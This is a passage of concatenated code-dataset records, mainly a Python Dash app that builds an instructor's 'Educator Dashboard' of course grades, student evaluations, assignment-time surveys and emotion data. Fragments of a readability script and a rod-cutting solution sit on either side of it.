richness = 0\n for (word, count) in sortedwordStats:\n totalWordCount += count\n for (word, count) in sortedwordStats:\n wordCount += count\n richness += 1\n if (wordCount >= 0.5 * totalWordCount):\n break\n return richness\n","repo_name":"zhoujoetan/Readability","sub_path":"readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":8263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19163596291","text":"import dash\nfrom dash import html\nimport pandas as pd\nimport plotly.express as px\nfrom dash import dcc\n\n# Constants\nrubric_heading = 'On a scale from 1 to 5, how satisfied are you with the rubric for this project?'\nproject_review_col = \"Which project are you reviewing (enter a # between 1 and 11)?\"\nhomework_review_col = \"Which homework assignment are you reviewing (enter a # between 1 and 22)?\"\npre_emotions_column = \"Which of the following emotions did you experience **before** starting this project (select all that apply)?\"\nduring_emotions_column = \"Which of the following emotions did you experience while completing this project (select all that apply)?\"\npost_emotions_column = \"Which of the following emotions did you experience **after** completing this project (select all that apply)?\"\ntime_col = \"How much time did you spend on this assignment in hours?\"\navg_time = \"Average Time (hours)\"\nmedian_time = \"Median Time (hours)\"\nreview_count = \"Number of Reviews\"\nstd_time = \"Standard Deviation (hours)\"\nassignment_type = \"Are you reviewing a project or a homework assignment?\"\nsatisfaction_mapping = {\n 1: 'Very Dissatisfied', \n 2:
'Dissatisfied', \n 3: 'Neutral', \n 4: 'Satisfied', \n 5: 'Very Satisfied'\n}\nlikert_scale = [\"Strongly disagree\", \"Disagree\", \"Neutral\", \"Agree\", \"Strongly agree\"]\nlikert_scale_alt = [\"Poor\", \"Fair\", \"Satisfactory\", \"Very good\", \"Excellent\"]\nsatisfaction_colors = dict(zip(satisfaction_mapping.values(), px.colors.sequential.Viridis[::2]))\n\ndef create_value_fig(grade_data, assignment_survey_data, assignment, max_score):\n assignment_score_data = [name for name in grade_data.columns if assignment in name]\n assignment_calculations = grade_data[assignment_score_data].agg([\"mean\", \"median\"]).T\n assignment_time_data = assignment_survey_data[assignment_survey_data[assignment_type] == \"Project\"]\n assignment_time_data = assignment_time_data.drop_duplicates(subset=[project_review_col]).sort_values(by=project_review_col)\n assignment_time_data[\"Project #\"] = \"Project #\" + assignment_time_data[project_review_col].astype(int).astype(str)\n assignment_time_data = assignment_time_data.set_index(f\"{assignment} #\")[median_time]\n assignment_aggregate_data = assignment_calculations.join(assignment_time_data)\n assignment_aggregate_data = assignment_aggregate_data.rename(columns={'mean': f'Average Score/{max_score}', 'median': f'Median Score/{max_score}'})\n assignment_aggregate_data[\"Points per Hour\"] = assignment_aggregate_data[f\"Median Score/{max_score}\"] / assignment_aggregate_data[\"Median Time (hours)\"]\n assignment_aggregate_data[\"Minutes per Point\"] = assignment_aggregate_data[\"Median Time (hours)\"] / assignment_aggregate_data[f\"Median Score/{max_score}\"] * 60\n assignment_aggregate_data = assignment_aggregate_data.reset_index()\n assignment_expected_time_fig = px.bar(\n assignment_aggregate_data,\n x=\"index\",\n y=\"Points per Hour\",\n labels={\n \"index\": \"Project Name\",\n \"Points per Hour\": \"Median Points/Hour of Work\",\n },\n text_auto=\".2s\",\n title=\"Expected Value Per Project\"\n )\n assignment_expected_time_fig.update_layout(showlegend=False)\n assignment_expected_effort_fig = px.bar(\n assignment_aggregate_data,\n x=\"index\",\n y=\"Minutes per Point\",\n labels={\n \"index\": \"Project Name\",\n \"Minutes per Point\": \"Median Minutes of Work/Point\",\n },\n text_auto=\".2s\",\n title=\"Expected Effort Per Project\"\n )\n assignment_expected_effort_fig.update_layout(showlegend=False)\n return assignment_expected_time_fig, assignment_expected_effort_fig\n\n\ndef create_correlation_fig(grade_data, correlating_factor, label):\n grade_overview = generate_grade_overview(grade_data)\n\n total_scores = grade_overview[\"Exams\"] * .6 \\\n + grade_overview[\"Homeworks\"] * .06 \\\n + grade_overview[\"Projects\"] * .3 \\\n + grade_overview[\"Participation\"] * .04\n\n correlation = {\n \"Grades\": total_scores,\n label: grade_data[correlating_factor]\n }\n\n return px.scatter(\n pd.DataFrame(correlation),\n y=\"Grades\",\n x=label,\n trendline=\"ols\",\n title=f\"Grades vs {label}\"\n )\n\n\ndef generate_grade_overview(grade_data):\n grade_data = grade_data[grade_data[\"Date\"] != \"2020-05-07\"]\n exam_columns = [name for name in grade_data.columns if \"Exam\" in name]\n homework_columns = [name for name in grade_data.columns if \"Homework\" in name]\n project_columns = [name for name in grade_data.columns if \"Project\" in name]\n participation_columns = [name for name in grade_data.columns if \"Participation\" in name]\n\n exam_grades = grade_data[exam_columns].sum(axis=1) / (100 * 3) * 100\n homework_grades = 
grade_data[homework_columns].sum(axis=1) / (2 * 22) * 100\n project_grades = grade_data[project_columns].sum(axis=1) / (10 * 11) * 100\n participation_grades = grade_data[participation_columns].sum(axis=1) / (4 * 1) * 100\n\n overview_dict = {\n \"Exams\": exam_grades,\n \"Homeworks\": homework_grades,\n \"Projects\": project_grades,\n \"Participation\": participation_grades\n }\n\n return pd.DataFrame(overview_dict)\n\n\ndef create_grades_fig(grade_data):\n assignment_calculations = generate_grade_overview(grade_data).agg([\"mean\", \"median\"]).T\n grade_fig = px.bar(\n assignment_calculations,\n labels={\n \"index\": \"Assignment Type\",\n \"value\": \"Grade/100%\",\n \"variable\": \"Metric\",\n \"mean\": \"Average\",\n \"median\": \"Median\"\n },\n barmode=\"group\",\n title=f\"Overview of Course Grades by Type\"\n )\n return grade_fig\n\n\ndef create_assignment_fig(grade_data, assignment, total):\n assignment_data = [name for name in grade_data.columns if assignment in name]\n assignment_calculations = grade_data[assignment_data].agg([\"mean\", \"median\"]).T\n assignment_calculations.rename(columns={'mean': 'Average', 'median': 'Median'}, inplace=True)\n assignment_calculations_fig = px.bar(\n assignment_calculations,\n labels={\n \"index\": \"Project Name\",\n \"value\": f\"Grade/{total}\",\n \"variable\": \"Metric\",\n \"mean\": \"Average\",\n \"median\": \"Median\"\n },\n barmode='group',\n text_auto=\".2s\",\n title=f\"Average and Median {assignment} Grades\".title()\n )\n return assignment_calculations_fig\n\ndef create_course_eval_fig(course_eval_data, question, axes_labels):\n colors = dict(zip(axes_labels, satisfaction_colors.values()))\n question_data = course_eval_data.melt(\n id_vars=[item for item in course_eval_data.columns if question not in item],\n var_name=\"Question\",\n value_name=\"Response\"\n )\n question_data = question_data[question_data[\"Response\"].notna()]\n question_fig = px.histogram(\n question_data, \n x=\"Response\", \n color=\"Response\", \n facet_col=\"Question\", \n facet_col_wrap=2, \n category_orders=dict(Response=axes_labels),\n text_auto=True,\n title=f\"{question} by Subquestion\".title(),\n color_discrete_map=colors\n )\n question_fig.for_each_annotation(lambda a: a.update(text=a.text[a.text.find(\"[\")+1:a.text.find(\"]\")]))\n return question_fig\n\ndef create_sei_fig(sei_data):\n sei_data[\"Date\"] = pd.to_datetime(sei_data[\"Date\"])\n sei_fig = px.line(\n sei_data, \n x=\"Date\", \n y=\"Mean\", \n color=\"Group\", \n facet_col=\"Question\", \n facet_col_wrap=2, \n markers=True, \n title=\"Student Evaluation of Instruction Trends by Cohort\"\n )\n sei_fig.for_each_annotation(lambda a: a.update(text=a.text.split(\"=\")[-1]))\n return sei_fig\n\ndef create_time_fig(assignment_survey_data, col):\n to_plot = assignment_survey_data.drop_duplicates(subset=[col]).sort_values(by=col)\n to_plot = to_plot.melt(\n id_vars=[item for item in to_plot.columns if item not in [avg_time, median_time]], \n var_name=\"Metric\", \n value_name=\"Time (hours)\"\n )\n time_fig = px.bar(\n to_plot, \n x=col, \n y=\"Time (hours)\", \n color=\"Metric\", \n text_auto=\".2s\", \n barmode='group',\n title=\"Average and Median Assignment Time\",\n error_y=std_time,\n hover_data=[review_count]\n )\n time_fig.update_traces(textfont_size=12, textangle=0, textposition=\"inside\", insidetextanchor=\"start\", cliponaxis=False)\n return time_fig\n\ndef create_rubric_scores_fig(assignment_survey_data):\n rubric_scores = 
assignment_survey_data.groupby(project_review_col)[rubric_heading].agg([\"mean\", \"count\"])\n rubric_scores_fig = px.bar(\n rubric_scores, \n y=\"mean\", \n color=\"count\",\n labels={\n \"mean\": \"Average Score (out of 5)\",\n \"count\": \"Number of Reviews\"\n },\n text_auto=\".3s\",\n title=\"Project Rubric Satisfaction Scores\",\n color_continuous_scale=px.colors.sequential.Viridis\n )\n return rubric_scores_fig\n\ndef create_rubric_overview_fig(assignment_survey_data):\n data = assignment_survey_data[rubric_heading].value_counts()\n rubric_fig = px.bar(\n data, \n color=data.index,\n category_orders={\"index\": list(satisfaction_mapping.values())},\n labels={\n \"index\": 'Response',\n \"value\": 'Number of Reviews',\n \"color\": 'Response'\n },\n text_auto=True,\n title=\"Project Rubric Satisfaction Overview\",\n color_discrete_map=satisfaction_colors\n )\n return rubric_fig\n\ndef create_rubric_breakdown_fig(assignment_survey_data):\n data = assignment_survey_data.groupby(project_review_col)[rubric_heading] \\\n .value_counts() \\\n .unstack() \\\n .reset_index() \\\n .melt(id_vars=[project_review_col], var_name=\"Response\", value_name=\"Number of Reviews\") \\\n .dropna() \n rubric_breakdown_fig = px.bar(\n data, \n x=\"Response\",\n y=\"Number of Reviews\",\n color=\"Response\",\n facet_col=project_review_col, \n facet_col_wrap=2,\n text_auto=True,\n category_orders={\n rubric_heading: list(satisfaction_mapping.values()),\n project_review_col: list(range(1, 12))\n },\n labels={\n rubric_heading: 'Response',\n },\n title=\"Rubric Satisfaction By Project\",\n color_discrete_map=satisfaction_colors\n )\n rubric_breakdown_fig.for_each_annotation(lambda a: a.update(text=f'Project {a.text.split(\"=\")[-1]}'))\n return rubric_breakdown_fig\n\ndef create_missing_assignment_fig(grade_data, assignment):\n missing_assignment_data = (grade_data == 0).sum() / len(grade_data) * 100\n missing_assignment_data = missing_assignment_data.reset_index()\n missing_assignment_data.rename(columns={'index': 'Assignment', 0: 'Percent Missing'}, inplace=True)\n missing_assignment_data = missing_assignment_data.loc[missing_assignment_data[\"Assignment\"].str.contains(assignment)]\n missing_assignment_fig = px.bar(\n missing_assignment_data, \n x=\"Assignment\", \n y=\"Percent Missing\", \n text_auto=\".2s\", \n title=f\"Percent of Missing {assignment}s\"\n )\n return missing_assignment_fig\n\ndef create_project_trend_fig(grade_data, assignment):\n trend_data = grade_data.groupby(\"Date\").mean()[[item for item in grade_data if assignment in item]]\n trend_data = trend_data.reset_index().melt(\n id_vars=\"Date\",\n var_name=\"Assignment\", \n value_name=\"Average Score\"\n ).dropna()\n \n trend_fig = px.line(\n trend_data,\n x=\"Date\",\n y=\"Average Score\",\n color=\"Assignment\",\n markers=True,\n title=f\"Average {assignment} Score by Date\"\n )\n return trend_fig\n\ndef create_emotions_fig(assignment_survey_data, review_column):\n emotions_data = assignment_survey_data.explode(pre_emotions_column)\n emotions_data = emotions_data.explode(during_emotions_column)\n emotions_data = emotions_data.explode(post_emotions_column)\n emotions_data = emotions_data[emotions_data[pre_emotions_column].isin([\"Joy\", \"Hope\", \"Hopelessness\", \"Relief\", \"Anxiety\"])]\n emotions_data = emotions_data[emotions_data[during_emotions_column].isin([\"Enjoyment\", \"Anger\", \"Frustration\", \"Boredom\"])]\n emotions_data = emotions_data[emotions_data[post_emotions_column].isin([\"Joy\", \"Pride\", \"Gratitude\", 
\"Sadness\", \"Shame\", \"Anger\"])]\n emotions_data = emotions_data.groupby(review_column)[[pre_emotions_column, during_emotions_column, post_emotions_column]].value_counts() \n emotions_data = emotions_data.reset_index().melt(id_vars=review_column, value_vars=[pre_emotions_column, during_emotions_column, post_emotions_column])\n emotions_data = emotions_data.replace({\n pre_emotions_column: \"Pre-Assignment\",\n during_emotions_column: \"During Assignment\",\n post_emotions_column: \"Post-Assignment\"\n })\n emotions_figure = px.histogram(\n emotions_data,\n x=\"value\",\n color=\"variable\",\n facet_col=review_column,\n facet_col_wrap=2,\n labels={\n \"value\": 'Emotion' \n }\n )\n emotions_figure.for_each_annotation(lambda a: a.update(text=f'Homework {a.text.split(\"=\")[-1].split(\".\")[0]}'))\n return emotions_figure\n\ndef create_sei_tab() -> dcc.Tab:\n \"\"\"\n Creates the tab containing all of the student evaluation of instruction figures.\n\n :return: the tab containing all of the student evaluation of instruction figures\n \"\"\"\n return dcc.Tab(label=\"Student Evaluation of Instruction\", children=[\n html.H2(children='Student Evaluation of Instruction'),\n html.P(children=\n '''\n Each semester, the university asks students to fill out a survey about the instruction for the course.\n These data are anonymized and provided as averages for each question. Here is the breakdown of my scores\n against the scores for various cohorts including my department, my college, and my university. In general,\n I outperform all three cohorts, but I'm noticing a downward trend in course organization. For context,\n I taught CSE 1223 in the Fall of 2018 and the Spring of 2019. I've been teaching CSE 2221 ever since, with\n a year gap for research. \n '''\n ),\n dcc.Graph(id=\"bad-scale-1\", figure=sei_fig),\n ])\n\ndef create_course_eval_tab() -> dcc.Tab:\n return dcc.Tab(label=\"Course Evaluation Survey\", children=[\n html.H2(children='Course Evaluation Survey Data'),\n dcc.Markdown(\n '''\n At the end of each semester, I ask students to give me feedback on the course. These data are collected\n through a Google Form. Questions are broken down into different areas which include feedback on\n course content, my skill and responsiveness, and the course's contribution to learning. **Note**:\n future work is being done to ensure the following plots feature review counts as seen in the assignment\n survey data. \n '''\n ),\n html.H3(children='Course Content'),\n html.P(children=\n '''\n One way the course was evaluated was by asking students to rate their satisfaction with the course content.\n In short, there are four questions that I ask that cover topics that range from learning objectives to\n organization. Generally, the students that choose to fill out the course survey seem to be satisfied with \n the course content. For example, at this time, there have been no \"strongly disagree\" responses. \n '''\n ),\n dcc.Graph(figure=course_content_fig),\n html.H3(children='Skill and Responsiveness of the Instructor'),\n html.P(children=\n '''\n Another way the course was evaluated was by asking students to rate their satisfaction with the instructor, me.\n This time around, I ask six questions which range from satisfaction with time usage to satisfaction\n with grading. Again, students are generally happy with my instruction. In fact, they're often more happy\n with my instruction than the course content itself. 
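# [Annotation, not from the dashboard source] A minimal sketch of the wide-to-long
# reshape behind create_course_eval_fig: every survey column sharing a question
# stem is melted into (Question, Response) pairs so px.histogram can facet on
# Question. The column names below are hypothetical stand-ins for the real headers.
import pandas as pd

wide = pd.DataFrame({
    "Course content [Organization]": ["Agree", "Neutral"],
    "Course content [Learning objectives]": ["Strongly agree", "Agree"],
})
long_form = wide.melt(var_name="Question", value_name="Response")
# long_form now has one row per (question, response), ready for faceted plotting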
\n '''\n ),\n dcc.Graph(figure=skill_and_responsiveness_fig),\n html.H3(children='Contribution to Learning'),\n dcc.Markdown(\n '''\n Yet another way the course was evaluated was by asking students how much they felt the course contributed to \n their learning. In this section of the survey, I ask students four questions that attempt to chart how much\n students felt they learned over the course of the semester. In general, students believe they learned a great\n deal, with most students reporting only a fair amount of knowledge coming into the course and a very good\n amount of knowledge at the end of the course. **TODO**: I should add a plot showing the scores for all four\n questions with an additional plot showing the trajectory of learning over the semester.\n '''\n ),\n dcc.Graph(figure=contribution_to_learning_fig),\n ])\n\ndef create_assignment_survey_tab() -> dcc.Tab:\n return dcc.Tab(label=\"Assignment Survey [CSE 2221]\", children=[\n html.H2(children='Assignment Survey Data [CSE 2221]'),\n html.P(children=\n '''\n Throughout the course, I asked students to give me feedback on the assignments. Originally,\n these data were collected through a Carmen quiz (Autumn 2021). However, I found the Carmen \n quiz format to be limiting, so later iterations of the quiz were administered through a Google\n Form. \n '''\n ),\n html.H3(children='Time Spent Working on Projects'),\n html.P(children=\n '''\n One of the questions I asked my students was how long they spent on each project. Based on the responses,\n I found that students spent between 2 and 7.5 hours on each project on average. In general, these values\n trend up as the semester progresses. If we assume that students then spend an average of 4 hours on each\n project, they will conduct roughly 44 hours of work over the course of the semester. \n '''\n ), # TODO: use an f-string to include the min and max average here\n dcc.Graph(figure=project_time_fig),\n html.H3(children='Time Spent Working on Homework Assignments'),\n html.P(children=\n '''\n Similarly, I asked students to tell me how much time they spent on the homework assignments.\n The data is fairly preliminary, so I only have the first few homework assignments. That\n said, I am finding that students spend multiple hours a week on each written assignment.\n '''\n ),\n dcc.Graph(figure=homework_time_fig),\n html.H3(children='Emotional Experience with Assignments'),\n html.P(children=\n '''\n Something new I tried in 2022 was asking students about the emotions they experienced\n before, during, and after assignments. For this, I borrowed the emotions from\n Control Value Theory and asked students retrospectively about their emotions. As it\n is early in the semester, I decided to only plot the homework assignments. Later,\n I'll update this dashboard to include the project assignments as well. \n '''\n ),\n dcc.Graph(figure=emotions_fig),\n html.H3(children='Rubric Evaluation'),\n html.P(children=\n \"\"\"\n Another question I asked my students was about their satisfaction with the rubrics for each project. \n The following plot gives the overview of the rubric ratings over all 11 projects. In general,\n it appears students are fairly satisfied with the rubrics.\n \"\"\"\n ),\n dcc.Graph(figure=rubric_fig),\n dcc.Markdown(\n \"\"\"\n In case you were curious about each project individually, here is a breakdown of the rubric scores for each project. 
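# [Annotation, not from the dashboard source] A hedged sketch of the
# groupby/value_counts/unstack/melt chain that create_rubric_breakdown_fig uses to
# get per-project response counts; the two-column frame here is toy data.
import pandas as pd

survey = pd.DataFrame({
    "project": [1, 1, 2],
    "rubric": ["Satisfied", "Neutral", "Satisfied"],
})
counts = (
    survey.groupby("project")["rubric"]
    .value_counts()
    .unstack()
    .reset_index()
    .melt(id_vars=["project"], var_name="Response", value_name="Number of Reviews")
    .dropna()
)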
\n \"\"\"\n ),\n dcc.Graph(id=\"bad-scale-2\", figure=rubric_breakdown_fig),\n dcc.Markdown(\n \"\"\"\n And just to be perfectly explicit, I also computed average scores for each rubric over all 11 projects.\n These scores are computed by assigning Very Dissatisfied (1) to the lowest score and Very Satisfied (5) \n to the highest score. Then, we sum up all the values and divide by the number of reviews. As a result,\n you can see that students are generally the least satisfied with the project 1 rubric and most satisfied\n with the project 3 rubric. \n \"\"\"\n ),\n dcc.Graph(figure=rubric_scores_fig),\n ])\n\ndef create_grades_tab() -> dcc.Tab:\n return dcc.Tab(label=\"Grades [CSE 2221]\", children=[\n html.H2(children='Grades [CSE 2221]'),\n html.P(children=\n '''\n Each semester, I collect grades for 22 homework assignments, 11 projects, and 3 exams. Fortunately,\n I have graders for the bulk of it, but I grade the exams. Recently, I decided to put together a\n database of grades which allows me to generate some pretty interesting plots.\n '''\n ),\n html.H3(children='Overview'),\n dcc.Markdown(children=\n '''\n Given the different types of grade data I collect, I figured I'd start by sharing an overview\n of the grades by type. **TODO**: There is an assumption that there are three exams each semester.\n One semester, there was only one exam before COVID. Grades from the semester of COVID have been\n filtered out of the overview plots.\n '''\n ),\n dcc.Graph(figure=grade_overview_fig),\n html.P(children=\n '''\n Given the history of grades in this course, I was also interested in seeing how the grades correlated\n with attendance, which is a metric I track through Top Hat. For context, I don't force attendance,\n so the attendance scores are more of a lower bound.\n '''\n ),\n dcc.Graph(figure=grades_vs_attendance),\n html.P(children=\n '''\n At the moment, the connection between attendance and grades is pretty small. At the time of writing,\n the correlation between attendance and grades gives an R-squared of .23. I can't remember off the top of my\n head if this is considered a good correlation in education, but online resources point to this being\n a weak to moderate positive correlation. \n '''\n ),\n html.P(children=\n '''\n Now, in order to get an attendance grade, you just enter some digits at the start of class.\n Participation, on the other hand, is calculated based on interaction with Top Hat. Some semesters,\n I've used Top Hat more often than others. For example, I used to use it quite a bit for Peer\n Instruction. These days, I don't use it as much, but it may be useful in demonstrating a\n strong correlation with grades. \n '''\n ),\n dcc.Graph(figure=grades_vs_participation),\n html.P(children=\n '''\n At the time of writing, the correlation was slightly stronger with an R-squared of .28. Though,\n there's not much to brag about there. That said, it does imply that attendance and participation\n positively correlate with grades. I wouldn't go as far as to say that attending class will\n improve your grades, but I would be lying if I didn't tell you that it could. \n '''\n ),\n html.H3(children='Project Grades'),\n html.P(children=\n '''\n To start, I'd like to talk about the 11 projects. Specifically, I'll share the average and median grade\n for each project. 
The key takeaway here is that project 1 is a slam dunk while project 8 is a bit rough.\n '''\n ),\n dcc.Graph(figure=project_calculations_fig),\n html.P(children=\n '''\n While medians and averages are helpful, I also think it's useful to look at just how many students\n actually complete the projects. Or rather, what percentage of students skip out on projects, and\n is there a trend to observe? If so (spoiler alert: students turn in less work as the semester \n progresses), that could potentially explain the low averages for certain projects. \n '''\n ),\n dcc.Graph(figure=missing_project_fig),\n dcc.Markdown(\n '''\n Unfortunately, one of the drawbacks of the plots above is that they aggregate the data for every\n semester I've taught the course. Personally, I like to see trends, right? For example, it's \n helpful to know if project grades are getting better over time. What I'm finding is that's not\n the case. Frankly, I think most of this is due to grader influences, but I have not investigated\n that. **TODO**: I should include grader influences in the plot. \n '''\n ),\n dcc.Graph(figure=project_trend_fig),\n dcc.Markdown(\n '''\n Next, we get into the \"advanced\" metrics. In this case, I thought it would be interesting to combine\n some of the data found in the assignment survey with the grade data. For instance, remember how\n I previously shared the amount of time students spent on each project on average? Well, I figured\n it would be interesting to see how many points a student could expect to earn per hour on average.\n Ultimately, I ended up calling this metric \"Expected Value\" because it gives us a sense of how\n much value a student could get out of their time. With this metric, we're able to clearly see that \n project 1 offers the most bang for your buck. Meanwhile, Project 8 offers very little in terms of\n value for your time. \n '''\n ),\n dcc.Graph(figure=project_points_per_hour_fig),\n dcc.Markdown(\n '''\n Interestingly, if we invert the previous plot, we get what I'm calling the \"Expected Effort\" metric.\n Rather than describing the amount of points we expect to get for an hour of work, we begin talking\n about how much time we expect to give for a point. The distinction is fairly minor, but it allows\n us to see which projects require the most effort. In this case, the roles are reversed. Project 1\n requires the least amount of effort, while project 8 requires the most.\n '''\n ),\n dcc.Graph(figure=project_hours_per_point_fig),\n html.H3(children='Homework Grades'),\n dcc.Markdown(\n '''\n In addition to 11 projects, we also assign 22 homework assignments. These assignments are graded\n on completion for a maximum of 2 points each. Naturally, here's the breakdown of average and median\n scores for each assignment. As you can see, students generally get full credit, but there are some\n students who pull the average down with incomplete assignments (more on that later).\n '''\n ),\n dcc.Graph(figure=homework_calculations_fig),\n dcc.Markdown(\n '''\n As promised, here's a look at the trend of homework completion. As with projects, students tend\n to submit fewer assignments as the semester progresses. Though, I find it interesting that there\n are spikes in missing assignments at various points throughout the semester. 
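# [Annotation, not from the dashboard source] The "missing assignment" metric
# discussed in this paragraph, as create_missing_assignment_fig computes it: a
# grade of 0 counts as a missing submission. Toy numbers, not the real gradebook.
import pandas as pd

grades = pd.DataFrame({"Homework 1": [2, 0, 2], "Homework 2": [0, 0, 2]})
percent_missing = (grades == 0).sum() / len(grades) * 100
# Homework 1 -> 33.3%, Homework 2 -> 66.7%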
I suspect that the \n assignments that students submit least often are tied to larger review assignments before exams.\n **TODO**: I should look into this more.\n '''\n ),\n dcc.Graph(figure=missing_homework_fig),\n dcc.Markdown(\n '''\n Finally, here's a look at the trend of grades for the homework assignments. I find this plot really\n interesting because it shows the spread of homework grades against each semester. For instance,\n there is quite the spread of homework averages in Autumn 2021. \n '''\n ),\n dcc.Graph(figure=homework_trend_fig),\n html.H3(children='Exam Grades'),\n dcc.Markdown(\n '''\n At this point, all that is left to discuss are the exams. In total, there are three exams, and the\n general trend tends to be that scores go down as the semester progresses. I haven't quite figured\n out why. \n '''\n ),\n dcc.Graph(figure=exams_calculations_fig),\n dcc.Markdown(\n '''\n As with projects and homework assignments, I find it important to also track the percentage of students\n who skip exams. In general, it's pretty rare for a student to skip an exam, and it's usually due to some\n extreme circumstance. That said, the trend remains the same for exams as well (i.e., fewer students attend\n the exams as the semester progresses).\n '''\n ),\n dcc.Graph(figure=missing_exam_fig),\n dcc.Markdown(\n '''\n All that is left to talk about is the exam score trend over time. One thing that is worth noting is that\n the exams were not consistent from semester to semester. For example, you'll notice that exams 2 and 3\n are missing data points. The reason for this is that we eventually converted those exams to online quizzes\n due to COVID. As a result, those quiz scores are omitted. It's also worth noting that the data points in\n Summer 2019 are from before I started teaching the course (i.e., I was training to teach it at the time).\n As a result, the first time I taught the course, my exam scores were quite low. Since then, things have\n improved considerably. Well, except for the final exam. I'll be looking to provide more ways for\n students to practice ahead of time. \n '''\n ),\n dcc.Graph(figure=exam_trend_fig),\n ])\n\ndef create_app_layout(): \n return html.Div(children=[\n html.H1(children='The Educator Dashboard'),\n html.Hr(),\n html.P(children=\n '''\n A collection of visualizations related to courses taught by myself, Jeremy Grifski, with the first two tabs dedicated\n to an overview of my ability as an instructor and the last two tabs dedicated to one of my courses. 
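# [Annotation, not from the dashboard source] A minimal, self-contained sketch of
# the tabbed layout pattern that create_app_layout uses here: each tab factory
# returns a dcc.Tab and the page is one html.Div wrapping dcc.Tabs. The app name
# "demo" is hypothetical.
from dash import Dash, dcc, html

demo = Dash(__name__)
demo.layout = html.Div([
    html.H1("Demo dashboard"),
    dcc.Tabs([
        dcc.Tab(label="First tab", children=[html.P("tab content")]),
    ]),
])
# demo.run_server(debug=True)  # uncomment to serve locally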
\n '''\n ),\n dcc.Tabs([\n create_sei_tab(),\n create_course_eval_tab(),\n create_assignment_survey_tab(),\n create_grades_tab()\n ])\n])\n\n# Global app\napp = dash.Dash(\n __name__,\n external_scripts=[\n {\n \"src\": \"https://plausible.io/js/plausible.js\",\n \"data-domain\": \"educator.jeremygrifski.com\"\n }\n ],\n title=\"The Educator Dashboard\"\n)\nserver = app.server\n\n# Assignment survey figures\nassignment_survey_data = pd.read_csv('https://raw.githubusercontent.com/jrg94/personal-data/main/education/assignment-survey-data.csv')\nassignment_survey_data[avg_time] = assignment_survey_data.groupby(project_review_col)[time_col].transform(lambda x: x.mean())\nassignment_survey_data[median_time] = assignment_survey_data.groupby(project_review_col)[time_col].transform(lambda x: x.median())\nassignment_survey_data[review_count] = assignment_survey_data.groupby(project_review_col)[time_col].transform(lambda x: x.count())\nassignment_survey_data[std_time] = assignment_survey_data.groupby(project_review_col)[time_col].transform(lambda x: x.std())\nhomework_time_mean = assignment_survey_data.groupby(homework_review_col)[time_col].transform(lambda x: x.mean())\nhomework_time_median = assignment_survey_data.groupby(homework_review_col)[time_col].transform(lambda x: x.median())\nhomework_time_count = assignment_survey_data.groupby(homework_review_col)[time_col].transform(lambda x: x.count())\nhomework_time_std = assignment_survey_data.groupby(homework_review_col)[time_col].transform(lambda x: x.std())\nassignment_survey_data.loc[homework_time_mean.index, avg_time] = homework_time_mean\nassignment_survey_data.loc[homework_time_median.index, median_time] = homework_time_median\nassignment_survey_data.loc[homework_time_count.index, review_count] = homework_time_count\nassignment_survey_data.loc[homework_time_std.index, std_time] = homework_time_std\nassignment_survey_data[pre_emotions_column] = assignment_survey_data[pre_emotions_column].astype(str).apply(lambda x: x.split(\";\"))\nassignment_survey_data[during_emotions_column] = assignment_survey_data[during_emotions_column].astype(str).apply(lambda x: x.split(\";\"))\nassignment_survey_data[post_emotions_column] = assignment_survey_data[post_emotions_column].astype(str).apply(lambda x: x.split(\";\"))\nproject_time_fig = create_time_fig(assignment_survey_data, col=project_review_col)\nhomework_time_fig = create_time_fig(assignment_survey_data, col=homework_review_col)\nrubric_scores_fig = create_rubric_scores_fig(assignment_survey_data)\nassignment_survey_data[rubric_heading] = assignment_survey_data[rubric_heading].map(satisfaction_mapping)\nrubric_fig = create_rubric_overview_fig(assignment_survey_data)\nrubric_breakdown_fig = create_rubric_breakdown_fig(assignment_survey_data)\nemotions_fig = create_emotions_fig(assignment_survey_data, review_column=homework_review_col)\n\n# SEI figures\nsei_data = pd.read_csv('https://raw.githubusercontent.com/jrg94/personal-data/main/education/sei-data.csv')\nsei_fig = create_sei_fig(sei_data)\n\n# Course evaluation figures\ncourse_eval_data = pd.read_csv('https://raw.githubusercontent.com/jrg94/personal-data/main/education/eval-data.csv')\ncourse_content_fig = create_course_eval_fig(course_eval_data, \"Course content\", likert_scale)\nskill_and_responsiveness_fig = create_course_eval_fig(course_eval_data, \"Skill and responsiveness\", likert_scale)\ncontribution_to_learning_fig = create_course_eval_fig(course_eval_data, \"Contribution to learning\", likert_scale_alt)\n\n# Assignment figures\ngrade_data 
= pd.read_csv('https://raw.githubusercontent.com/jrg94/personal-data/main/education/cse-2221-grades.csv')\ngrade_data[\"Date\"] = pd.to_datetime(grade_data[\"Date\"])\ngrade_overview_fig = create_grades_fig(grade_data)\ngrades_vs_attendance = create_correlation_fig(grade_data, \"TH-Attendance\", \"Top Hat Attendance\")\ngrades_vs_participation = create_correlation_fig(grade_data, \"Top Hat\", \"Top Hat Participation\")\nproject_calculations_fig = create_assignment_fig(grade_data, \"Project\", 10)\nhomework_calculations_fig = create_assignment_fig(grade_data, \"Homework\", 2)\nexams_calculations_fig = create_assignment_fig(grade_data, \"Exam\", 100)\nmissing_project_fig = create_missing_assignment_fig(grade_data, \"Project\")\nmissing_homework_fig = create_missing_assignment_fig(grade_data, \"Homework\")\nmissing_exam_fig = create_missing_assignment_fig(grade_data, \"Exam\")\nproject_trend_fig = create_project_trend_fig(grade_data, \"Project\")\nhomework_trend_fig = create_project_trend_fig(grade_data, \"Homework\")\nexam_trend_fig = create_project_trend_fig(grade_data, \"Exam\")\nproject_points_per_hour_fig, project_hours_per_point_fig = create_value_fig(grade_data, assignment_survey_data, \"Project\", 10)\n\napp.layout = create_app_layout()\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"jrg94/educator-dashboard","sub_path":"dashboard/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":33987,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41629004858","text":"#User function Template for python3\nimport sys\nclass Solution:\n # def f(self,ind,n,price,dp):\n # if ind==0:\n # return price[ind]*n\n # if dp[ind][n]!=-1:\n # return dp[ind][n]\n \n # nottake=0+self.f(ind-1,n,price,dp)\n # rodlength=ind+1\n # take=-sys.maxsize-1\n # if rodlength<=n:\n # take=price[ind]+self.f(ind,n-rodlength,price,dp)\n # dp[ind][n]= max(take,nottake)\n # return dp[ind][n]\n \n def cutRod(self, price, n):\n dp = [0] * (n + 1)\n for i in range(1, n + 1):\n for j in range(i):\n dp[i] = max(dp[i], price[j] + dp[i - j 